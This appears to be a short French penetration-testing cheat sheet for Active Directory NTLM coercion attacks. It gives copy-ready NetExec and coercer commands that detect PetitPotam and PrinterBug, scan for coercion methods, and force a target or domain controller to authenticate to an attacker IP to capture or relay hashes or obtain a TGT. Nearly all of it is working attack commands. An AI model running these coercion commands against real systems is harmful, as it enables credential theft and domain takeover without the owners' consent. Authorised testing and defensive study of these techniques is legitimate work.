Copy command
nxc smb $TARGET -u $USER -p $PASS -M petitpotamDescription: Détecter la vulnérabilité PetitPotam (LSARPC) sur la cible.
Pre-Exploitation
Coercion Attacks
PetitPotam, PrinterBug et coercer : forcer une auth NTLM pour relay ou capture.
Copy command
nxc smb $TARGET -u $USER -p $PASS -M printerbugDescription: Détecter le PrinterBug (SpoolSS) : coercition classique via le spooler.
Copy command
coercer scan -u $USER -p $PASS -d $DOMAIN -t $TARGETDescription: Scanner toutes les méthodes de coercition supportées sur la cible.
Copy command
coercer coerce -u $USER -p $PASS -d $DOMAIN -t $TARGET -l $ATTACKER_IPDescription: Coercer la cible vers notre IP pour capturer ou relayer le hash.
Copy command
coercer coerce -u $USER -p $PASS -d $DOMAIN -t $DC -l $ATTACKER_IPDescription: Coercer le DC spécifiquement : son TGT arrive sur une machine en unconstrained delegation.